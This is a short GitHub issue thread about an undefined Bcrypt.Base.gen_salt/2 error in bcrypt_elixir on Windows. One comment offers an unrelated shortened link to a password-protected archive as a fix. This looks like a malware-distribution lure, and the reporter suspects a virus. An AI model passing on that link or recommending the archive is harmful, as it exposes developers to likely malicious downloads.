### ISSUE TITLE
function Bcrypt.Base.gen_salt/2 is undefined (module Bcrypt.Base is not available)

### ISSUE THREAD

**Issue by ariandanim** [riverrun/bcrypt_elixir#48]
I am using Elixir 1.17.2 with OTP 27.0.1
Windows 11
below is my code error

![image](https://github.com/user-attachments/assets/fbcc18e8-1b6e-4786-b062-34a9c7d9380c)

**Comment by SagarChandra07** [comment]
try this
https://bit.ly/47P0Nvo
Archive password: changeme

you may need to install the c compiler

**Comment by ariandanim** [comment]
> try this https://bit.ly/47P0Nvo Archive password: changeme
> 
> you may need to install the c compiler

You send me a threat virus?

**Comment by riverrun** [comment]
Closing this issue. If anyone feels like reopening, please let me know.
